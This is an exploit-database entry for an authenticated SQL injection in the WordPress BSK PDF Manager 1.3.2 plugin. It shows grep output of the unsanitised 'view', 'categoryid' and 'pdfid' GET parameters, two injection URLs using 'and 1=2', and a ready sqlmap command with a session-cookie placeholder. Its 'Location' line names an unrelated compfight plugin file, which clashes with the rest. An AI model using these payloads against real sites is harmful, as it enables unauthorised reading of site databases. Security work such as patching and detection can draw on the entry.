Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection Vulnerability

2014-07-10T00:00:00
ID 1337DAY-ID-22428
Type zdt
Reporter Claudio Viviani
Modified 2014-07-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/

# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip

# Date : 2014-07-04

# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0

######################

# Location :
http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

[[email protected] ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['categoryid']) &&
$_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: $pdf_id = trim($_GET['pdfid']);


$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);

######################

Exploit Code via Browser:

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

Exploit Code via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u
"http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid

#  0day.today [2018-01-01]  #